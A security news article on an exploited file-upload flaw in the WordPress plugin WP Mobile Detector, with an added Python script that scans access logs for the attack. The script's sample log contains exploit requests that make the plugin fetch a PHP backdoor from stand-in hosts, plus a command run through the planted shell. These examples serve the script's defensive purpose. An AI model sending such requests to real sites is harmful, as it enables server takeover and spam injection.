WordPress users warned of plugin flaw being exploited in porn spam attack

Graham CLULEY

June 03, 2016

Tens of thousands of websites running WordPress are thought to have been put at risk from a vulnerability that hackers have been actively exploiting to inject pornographic spam messages.

The problem lies in versions of a WordPress plugin called WP Mobile Detector, which attempts to detect if visitors are browsing a website on a mobile device, and display an appropriate theme for the platform rather than one designed for desktop browsers.

As security researchers at Sucuri report, the vulnerability in WP Mobile Detector was publicly disclosed by the Plugin Vulnerabilities team at the end of May, a couple of days after the developers had been informed of the problem, and attackers were exploiting it before a fix was available.

Attackers were able to exploit a flaw in the plugin's code that failed to properly validate untrusted web input: one of its scripts fetched whatever file a request pointed to and stored it on the web server without checking what kind of file it was, allowing anyone to plant malicious PHP code on a vulnerable website.

What raised alarm was how easy the security hole was to exploit: a single crafted request was typically enough to drop a payload that gave attackers remote access, as Douglas Santos of Sucuri explained:

“The vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.”
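The request pattern Santos describes is easy to hunt for in web-server access logs. The script below is an added example, not code from the article, from Sucuri or from the plugin's developer. It assumes the logs are in the common Apache/nginx "combined" format and that the plugin lives at the default WordPress plugin path, wp-content/plugins/wp-mobile-detector/. It flags two things: a request to resize.php or timthumb.php carrying a remote URL in any query parameter (the fetch described above), and a later direct request for a PHP file under the plugin directory other than those two scripts, which is what a planted backdoor being used would look like. The log lines are constructed for the example; the file names in them are not real indicators.

```python
"""Hunt access logs for the WP Mobile Detector fetch-and-drop pattern.

Added example (not the article's or the plugin's code). Assumes combined
log format and the default plugin path; the sample lines below are
constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Default WordPress plugin location for this plugin (assumption).
PLUGIN_DIR = "/wp-content/plugins/wp-mobile-detector/"
# The two scripts named in Sucuri's description of the exploit.
FETCH_SCRIPTS = {"resize.php", "timthumb.php"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Constructed sample traffic: one exploit attempt followed by use of the
# dropped file, one attempt via timthumb.php, and two benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jun/2016:10:14:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.9/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jun/2016:10:14:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php?cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.22 - - [01/Jun/2016:10:20:11 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=https%3A%2F%2Fevil.example%2Fx.txt HTTP/1.1" 200 512 "-" "curl/7.47"
192.0.2.5 - - [01/Jun/2016:10:21:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=wp-content/uploads/2016/05/photo.jpg&w=320 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.6 - - [01/Jun/2016:10:22:30 +0000] "GET /index.php HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return (kind, ip, script, remote_url) for a suspicious line, else None.

    kind is "remote-fetch" for resize.php/timthumb.php called with a remote
    URL in any parameter, or "direct-php" for any other .php file requested
    directly under the plugin directory.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith(PLUGIN_DIR):
        return None
    rel = parts.path[len(PLUGIN_DIR):]
    # parse_qs percent-decodes values, so an encoded https%3A%2F%2F is caught too.
    params = parse_qs(parts.query, keep_blank_values=True)
    if rel.lower() in FETCH_SCRIPTS:
        remote = [v for vals in params.values() for v in vals
                  if v.lower().startswith(REMOTE_SCHEMES)]
        if remote:
            return ("remote-fetch", m.group("ip"), rel, remote[0])
        return None  # local src paths are the script's normal use
    if rel.lower().endswith(".php"):
        return ("direct-php", m.group("ip"), rel, None)
    return None


def scan(log_text):
    """Classify every line of a log and return the list of hits in order."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for kind, ip, script, url in scan(SAMPLE_LOG):
        print(f"{kind:13} {ip:15} {script} {url or ''}")
```

Feed it real access logs with `scan(open(path).read())`. A "remote-fetch" hit shows an attempt, not necessarily success; a following "direct-php" hit from the same address is the stronger signal and means the plugin directory should be compared against a clean copy of the release for files that were never part of it.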

The makers of WP Mobile Detector pulled the vulnerable plugin from the WordPress plugin directory while they worked on a fix – but that doesn’t mean, of course, that websites were not compromised in the meantime.

Prior to the plugin’s withdrawal from release, it reportedly had more than 10,000 active installations – and although that figure has seemingly slumped significantly since news of the vulnerability first broke, it’s likely that there are still websites out there at risk of being exploited via the flaw.

Yesterday, a new version of WP Mobile Detector (version 3.6) was thankfully released by its developer Websitez which fixes the flaw – and, at the time of writing, the latest edition is version 3.7.

Of course, a new version of the plugin isn’t much help unless website administrators update their version of the plugin as a matter of priority.

Readers should note that sites running self-hosted versions of WordPress from WordPress.org are different from the many millions of blogs which run on WordPress.com. WordPress.com, run by Automattic, manages the installation of WordPress for you, and looks after security on your behalf.

The flaw described above is only an issue for self-hosted versions of WordPress running the WP Mobile Detector plugin. Furthermore, it is understood that the vulnerability requires the allow_url_fopen option to be enabled on the server to be exploitable, since the vulnerable script fetches the attacker’s file from a remote URL.

If you do self-host your WordPress site, you have to acknowledge that security is your responsibility (or find yourself a managed WordPress host who is prepared to take it on for you), as vulnerabilities are often found in the software and its many third-party plugins.

You can reduce the risk of your own site being compromised by keeping WordPress and its plugins updated, and keeping the number of plugins you use to a minimum.

And while we’re on the topic of confusing names, it’s worth underlining that the issue resides in WP Mobile Detector, not in other WordPress plugins which may have similar names (such as WP Mobile Detect).

And yes, naming can be very confusing in the world of technology. You’re not the only one to think so.
